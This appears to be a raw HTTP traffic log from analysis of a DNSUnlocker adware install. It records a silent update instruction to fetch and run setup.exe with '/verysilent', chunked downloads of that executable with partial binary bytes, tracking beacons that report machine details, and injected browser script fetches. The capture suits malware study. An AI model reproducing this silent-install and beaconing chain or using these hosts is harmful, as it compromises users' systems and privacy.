X-Last-HTTP-Status-Code: 412
X-Retry-Count: 0
Host: update.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:22 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1454605844"
Last-Modified: Thu, 04 Feb 2016 17:10:44 GMT
Cache-Control: max-age=21600
Content-Length: 993
Content-Type: text/xml; charset=UTF-8
X-HW: 1456422142.dop001.fr7.t,1456422142.cds029.fr7.c
<?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.0" server="prod">. <daystart elapsed_seconds="56508"/>. <app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">. <updatecheck status="noupdate"/>. <ping status="ok"/>. </app>. <app appid="{84f03351-931d-41a5-a53d-6b5a7a5a2c96}" status="ok">. <updatecheck status="ok">. <urls>. <url codebase="hXXp://cdn.roastfiles2017.com/download/66/60001/DNSUnlocker/"/>. </urls>. <manifest version="1.3.25.36">. <packages>. <package hash="Gf6XxEvl3JcorzFhctEtWsC2muE=" name="setup.exe" required="true" size="1141502"/>. </packages>. <actions>. <action arguments="/verysilent" event="update" run="setup.exe" />. <action version="1.3.25.36" event="postinstall" onsuccess="exitsilentlyonlaunchcmd"/>. </actions>. </manifest>. </updatecheck>. <ping status="ok"/>. </app>.</response>...
GET /monetization.gif?event=4&ibic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201&app=64755&bhover=1_35_09_29&xpiver=0_95&crxver=1_26_43&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1456422014&asw=0_1073750528_0&iep=1&chp=na&ffp=na&browser=ie,de,te,tc&rnd=1456422014 HTTP/1.1
Host: logs.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:39 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1456422159.dop016.fr7.t,1456422159.cds050.fr7.c
GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Thu, 25 Feb 2016 17:42:39 GMT..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 35..Content-Type: image/gif..X-HW: 1456422159.dop016.fr7.t,1456422159.cds050.fr7.c..GIF89a.............,...........D..;..
GET /installer.gif?action=started&app=64755&appver=0&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&xpiver=0_95&crxver=1_26_43&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350017&asw=0&asw2=1073750528&asw3=0&crtnm=MorganEnterMode&procstarttime=1456422014&procruntime=4&rnd=1456422018 HTTP/1.1
Host: stats.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: V0yDluovbLZtnr7Y6CIR Wdf7aIxX8ZHAIVIseurioi9mWcKXBUm8YZX2amA/yEyFw3WnHABxsA=
x-amz-request-id: 7A4D6F935DEEF740
Date: Thu, 25 Feb 2016 17:42:16 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 25 Feb 2014 00:06:34 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: V0yDluovbLZtnr7Y6CIR Wdf7aIxX8ZHAIVIseurioi9mWcKXBUm8YZX2amA/yEyFw3WnHABxsA=..x-amz-request-id: 7A4D6F935DEEF740..Date: Thu, 25 Feb 2016 17:42:16 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Tue, 25 Feb 2014 00:06:34 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /apps.gif?action=update&app=64755&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&ver=1_35_09_29&installtime=1456422014&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=002201&subid=0&zdata=0&appver=151&bgver=17&pluginsver=128&curtime=1456422032&lifetime=18&oldappver=43&oldbgver=1&oldpluginsver=37&rnd=8700 HTTP/1.1
Accept: */*
Host: stats.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: R2kGtHheD445mnN2QeE/oa2yCwQPig4tg lFCvpKQKKpNEGu/O4z6MoWArb3gr24gUxPs7BiJBg=
x-amz-request-id: F56AE9D950BAAAD1
Date: Thu, 25 Feb 2016 17:42:30 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 25 Feb 2014 00:06:25 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: R2kGtHheD445mnN2QeE/oa2yCwQPig4tg lFCvpKQKKpNEGu/O4z6MoWArb3gr24gUxPs7BiJBg=..x-amz-request-id: F56AE9D950BAAAD1..Date: Thu, 25 Feb 2016 17:42:30 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Tue, 25 Feb 2014 00:06:25 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /installer.gif?action=finished&app=64755&appver=151&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&xpiver=0_95&crxver=1_26_43&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350017&asw=0&asw2=1073750528&asw3=0&crtnm=MorganEnterMode&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1456422014&procruntime=28&rnd=1456422042 HTTP/1.1
Host: stats.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: x3E G/Ql8kPOuBCrZ40b2DJUuNe1 KVwbRZXADv5q2NM6mMk UHrkOxzeTK8rxmmglzTyttzfUU=
x-amz-request-id: 85C0F7272F6CE521
Date: Thu, 25 Feb 2016 17:42:40 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 25 Feb 2014 00:06:34 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /apps.gif?action=install&app=64755&appver=151&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&installtime=1456422014&lifetime=0&silent=1&crtnm=MorganEnterMode&procstarttime=1456422014&procruntime=28&rnd=1456422042 HTTP/1.1
Host: stats.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: I4M97BWeFobzd4oQMIcVVKifrL9B 5IbSZiu2uYS3lzBXvuIua9Ls1Niy0Ao3rSxjT31TxSvduc=
x-amz-request-id: DCE50181449CA089
Date: Thu, 25 Feb 2016 17:42:40 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 25 Feb 2014 00:06:25 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: I4M97BWeFobzd4oQMIcVVKifrL9B 5IbSZiu2uYS3lzBXvuIua9Ls1Niy0Ao3rSxjT31TxSvduc=..x-amz-request-id: DCE50181449CA089..Date: Thu, 25 Feb 2016 17:42:40 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Tue, 25 Feb 2014 00:06:25 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..
GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=0-5444
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
User-Agent: Microsoft BITS/6.7
Host: cdn.roastfiles2017.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Server: nginx/1.7.2
Content-Type: application/octet-stream
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: public, max-age=0
Pragma: no-cache
Accept-Ranges: bytes
Date: Thu, 25 Feb 2016 17:42:33 GMT
Via: 1.1 varnish
Age: 1601
Connection: keep-alive
X-Served-By: cache-fra1238-FRA
X-Cache: HIT
X-Cache-Hits: 976
X-Timer: S1456422153.287588,VS0,VE0
Content-Range: bytes 0-5444/1153385
Content-Length: 5445
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................@...............................................t...........=...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc....=.......>...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i.
<<< skipped >>>
GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=5445-13791
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
User-Agent: Microsoft BITS/6.7
Host: cdn.roastfiles2017.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Server: nginx/1.7.2
Content-Type: application/octet-stream
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: public, max-age=0
Pragma: no-cache
Accept-Ranges: bytes
Date: Thu, 25 Feb 2016 17:42:37 GMT
Via: 1.1 varnish
Age: 1605
Connection: keep-alive
X-Served-By: cache-fra1238-FRA
X-Cache: HIT
X-Cache-Hits: 983
X-Timer: S1456422157.750239,VS0,VE0
Content-Range: bytes 5445-13791/1153385
Content-Length: 8347
<<< skipped >>>
GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=13792-25330
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
User-Agent: Microsoft BITS/6.7
Host: cdn.roastfiles2017.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Server: nginx/1.7.2
Content-Type: application/octet-stream
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: public, max-age=0
Pragma: no-cache
Accept-Ranges: bytes
Date: Thu, 25 Feb 2016 17:42:40 GMT
Via: 1.1 varnish
Age: 1608
Connection: keep-alive
X-Served-By: cache-fra1238-FRA
X-Cache: HIT
X-Cache-Hits: 990
X-Timer: S1456422160.842481,VS0,VE0
Content-Range: bytes 13792-25330/1153385
Content-Length: 11539
<<< skipped >>>
GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=25331-36869
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
User-Agent: Microsoft BITS/6.7
Host: cdn.roastfiles2017.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Server: nginx/1.7.2
Content-Type: application/octet-stream
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: public, max-age=0
Pragma: no-cache
Accept-Ranges: bytes
Date: Thu, 25 Feb 2016 17:42:42 GMT
Via: 1.1 varnish
Age: 1610
Connection: keep-alive
X-Served-By: cache-fra1238-FRA
X-Cache: HIT
X-Cache-Hits: 996
X-Timer: S1456422162.138030,VS0,VE0
Content-Range: bytes 25331-36869/1153385
Content-Length: 11539
<<< skipped >>>
GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=36870-60156
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
User-Agent: Microsoft BITS/6.7
Host: cdn.roastfiles2017.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Server: nginx/1.7.2
Content-Type: application/octet-stream
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: public, max-age=0
Pragma: no-cache
Accept-Ranges: bytes
Date: Thu, 25 Feb 2016 17:42:43 GMT
Via: 1.1 varnish
Age: 1611
Connection: keep-alive
X-Served-By: cache-fra1238-FRA
X-Cache: HIT
X-Cache-Hits: 999
X-Timer: S1456422163.281776,VS0,VE0
Content-Range: bytes 36870-60156/1153385
Content-Length: 23287
<<< skipped >>>
GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=60157-106798
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
User-Agent: Microsoft BITS/6.7
Host: cdn.roastfiles2017.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Server: nginx/1.7.2
Content-Type: application/octet-stream
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: public, max-age=0
Pragma: no-cache
Accept-Ranges: bytes
Date: Thu, 25 Feb 2016 17:42:44 GMT
Via: 1.1 varnish
Age: 1612
Connection: keep-alive
X-Served-By: cache-fra1238-FRA
X-Cache: HIT
X-Cache-Hits: 1000
X-Timer: S1456422164.355846,VS0,VE0
Content-Range: bytes 60157-106798/1153385
Content-Length: 46642
<<< skipped >>>
GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=106799-199361
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
User-Agent: Microsoft BITS/6.7
Host: cdn.roastfiles2017.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Server: nginx/1.7.2
Content-Type: application/octet-stream
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: public, max-age=0
Pragma: no-cache
Accept-Ranges: bytes
Date: Thu, 25 Feb 2016 17:42:45 GMT
Via: 1.1 varnish
Age: 1613
Connection: keep-alive
X-Served-By: cache-fra1238-FRA
X-Cache: HIT
X-Cache-Hits: 1004
X-Timer: S1456422165.419858,VS0,VE0
Content-Range: bytes 106799-199361/1153385
Content-Length: 92563
<<< skipped >>>
GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=199362-382774
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
User-Agent: Microsoft BITS/6.7
Host: cdn.roastfiles2017.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Server: nginx/1.7.2
Content-Type: application/octet-stream
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: public, max-age=0
Pragma: no-cache
Accept-Ranges: bytes
Date: Thu, 25 Feb 2016 17:42:46 GMT
Via: 1.1 varnish
Age: 1614
Connection: keep-alive
X-Served-By: cache-fra1238-FRA
X-Cache: HIT
X-Cache-Hits: 1007
X-Timer: S1456422166.481635,VS0,VE0
Content-Range: bytes 199362-382774/1153385
Content-Length: 183413
<<< skipped >>>
GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=382775-754213
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
User-Agent: Microsoft BITS/6.7
Host: cdn.roastfiles2017.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Server: nginx/1.7.2
Content-Type: application/octet-stream
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: public, max-age=0
Pragma: no-cache
Accept-Ranges: bytes
Date: Thu, 25 Feb 2016 17:42:47 GMT
Via: 1.1 varnish
Age: 1615
Connection: keep-alive
X-Served-By: cache-fra1238-FRA
X-Cache: HIT
X-Cache-Hits: 1011
X-Timer: S1456422167.543334,VS0,VE0
Content-Range: bytes 382775-754213/1153385
Content-Length: 371439
<<< skipped >>>
GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=754214-1153384
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
User-Agent: Microsoft BITS/6.7
Host: cdn.roastfiles2017.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Server: nginx/1.7.2
Content-Type: application/octet-stream
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: public, max-age=0
Pragma: no-cache
Accept-Ranges: bytes
Date: Thu, 25 Feb 2016 17:42:48 GMT
Via: 1.1 varnish
Age: 1616
Connection: keep-alive
X-Served-By: cache-fra1238-FRA
X-Cache: HIT
X-Cache-Hits: 1015
X-Timer: S1456422168.607492,VS0,VE0
Content-Range: bytes 754214-1153384/1153385
Content-Length: 399171
<<< skipped >>>
GET /installer_updates/002201/update.json HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: update.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:14 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1410796465"
Last-Modified: Mon, 15 Sep 2014 15:54:25 GMT
Cache-Control: max-age=21600
Content-Length: 39
Content-Type: text/plain; charset=UTF-8
X-HW: 1456422134.dop005.fr7.t,1456422134.cds020.fr7.s,1456422134.dop003.se1.r,1456422134.cds013.se1.p,1456422134.cds020.fr7.p
{"update_from_version":"NA","url":"NA"}
GET /omaha/430FD4D0-B729-4F61-AA34-91526481799D/1/ping.xml?rand=15720 HTTP/1.1
User-Agent: Google Update/1.3.25.0;winhttp
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
Host: update.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:22 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1454602831"
Last-Modified: Thu, 04 Feb 2016 16:20:31 GMT
Cache-Control: max-age=12635
Content-Length: 229
Content-Type: text/xml; charset=UTF-8
X-HW: 1456422142.dop010.fr7.t,1456422142.cds047.fr7.c
<?xml version="1.0" encoding="UTF-8"?>
<response protocol="3.0" server="prod">
 <daystart elapsed_seconds="56754"/>
 <app appid="{430fd4d0-b729-4f61-aa34-91526481799d}" status="ok">
  <event status="ok"/>
 </app>
</response>
GET /plugins/mins/424.js?ver=3&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1435500466"
Last-Modified: Sun, 28 Jun 2015 14:07:46 GMT
Cache-Control: max-age=900
Content-Length: 1855
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop006.fr7.t,1456422148.cds005.fr7.c
<<< skipped >>>
GET /plugins/mins/223.js?ver=9&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1418314404"
Last-Modified: Thu, 11 Dec 2014 16:13:24 GMT
Cache-Control: max-age=900
Content-Length: 823
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop006.fr7.t,1456422148.cds007.fr7.c
GET /plugins/mins/273.js?ver=6&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1418314330"
Last-Modified: Thu, 11 Dec 2014 16:12:10 GMT
Cache-Control: max-age=900
Content-Length: 903
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop006.fr7.t,1456422148.cds007.fr7.c
GET /plugins/mins/311.js?ver=4&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1434015478"
Last-Modified: Thu, 11 Jun 2015 09:37:58 GMT
Cache-Control: max-age=900
Content-Length: 1055
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop006.fr7.t,1456422148.cds062.fr7.c
GET /plugins/mins/380.js?ver=1&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1424181436"
Last-Modified: Tue, 17 Feb 2015 13:57:16 GMT
Cache-Control: max-age=582
Content-Length: 1303
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop006.fr7.t,1456422148.cds004.fr7.c
<<< skipped >>>
GET /plugins/mins/184.js?ver=11&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1420026483"
Last-Modified: Wed, 31 Dec 2014 11:48:03 GMT
Cache-Control: max-age=900
Content-Length: 1231
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop006.fr7.t,1456422148.cds027.fr7.c
<<< skipped >>>
GET /plugins/mins/102.js?ver=15&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1426423396"
Last-Modified: Sun, 15 Mar 2015 12:43:16 GMT
Cache-Control: max-age=900
Content-Length: 1023
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop006.fr7.t,1456422148.cds035.fr7.c
GET /plugins/mins/376.js?ver=12&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1450608516"
Last-Modified: Sun, 20 Dec 2015 10:48:36 GMT
Cache-Control: max-age=437
Content-Length: 11146
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422149.dop006.fr7.t,1456422148.cds012.fr7.c
<<< skipped >>>
GET /plugins/mins/354.js?ver=2&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1418039174"
Last-Modified: Mon, 08 Dec 2014 11:46:14 GMT
Cache-Control: max-age=535
Content-Length: 122978
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422149.dop006.fr7.t,1456422148.cds054.fr7.c
__CTG_MAPPING__={"1":["d908e50170d7cb46a92fdbff0d73bb5d","0a64c81275732dcf0eb51fc0fdecfaa7","edb18644366c10cc24c58f6fb14ca9f4","15e39ed909ac8e17ae3cc3c91cd7ae9f","dccefc9affe37ba60b49d0a4789ce042","55a7d0f3833487778c3bdff8b2096e93","0212ae9fc1eeb53f9f641335b804d75e","d5e783fe22abe91aae7179d10a958497","9c8a818246bc677ef54725340e9c5a98","6871592501ed31709e241750c4363fce","1c5e3f677b22b8257c1df15a70e7df26","daf4c4488123ddadb30a7adaadb18b54","11fbd0aa23a016619379552c438b081a","fcaed5b82116cd700a0949772ad8ff49","6ac10c5f77cf4309c731a1edca41f357","5c83bc2a9fe11b248ee7a0577c7d8fdd","b4724ce8e3ac8d971ea648c70f1f3a28","5cfdb867e96374c7883b31d6928cc4cb","5bc25469aea12b844db6b49146c3e0ed","15830c2f3218394a63d70b23d235cc1c","7f5e73ea77ef99619089c3857dafdcb4","029c1c42a9160c3cf3db1a687f11ff72","e84400c002083678aa69041045895fae","da0239e7da0330fb26ef37dd1d940044","993439d6f7a4548cae1381c9073cbee1","24414caa6316a5694f77499fa604e5b1","340d70f50a7a4507bc874c8108bb45bc","2e44b2f1bf1b2b87d2be9f94ad2a2a35","5484845885ffd608ebb0ad1ac39434d4","96eb5194f361b233bf8fb9a80267f1de","91e4f116b8a4f5258b982d3c10910bdf","5638298177fc6af5190590244d6d8035","7712b7ac7ec5d5966fb35b1425d0283f","1080cee006e84c91858613ce7dde99fb","428d0f3d623a15db6cacb689e86b4352","8b25ca5c09e10312a1567fb3d7f82c07","84dcb17eaafb9d32908759a607838c8b","fcbed3a6b1e592c8efddf3f925b26b7f","7eae142b683afcf5aee231291c679877","9bcd814058bcf8f6497f0495e0a2fd71","6bb8719fca4581212b3aa47da8755163","adb2121658b69c9a701f270c8faba02f","5694f231cd01d8222d59557c56cef9a7","b7444e18
<<< skipped >>>
GET /plugins/mins/345.js?ver=47&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:29 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1450797163"
Last-Modified: Tue, 22 Dec 2015 15:12:43 GMT
Cache-Control: max-age=900
Content-Length: 781
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422149.dop006.fr7.t,1456422149.cds047.fr7.c
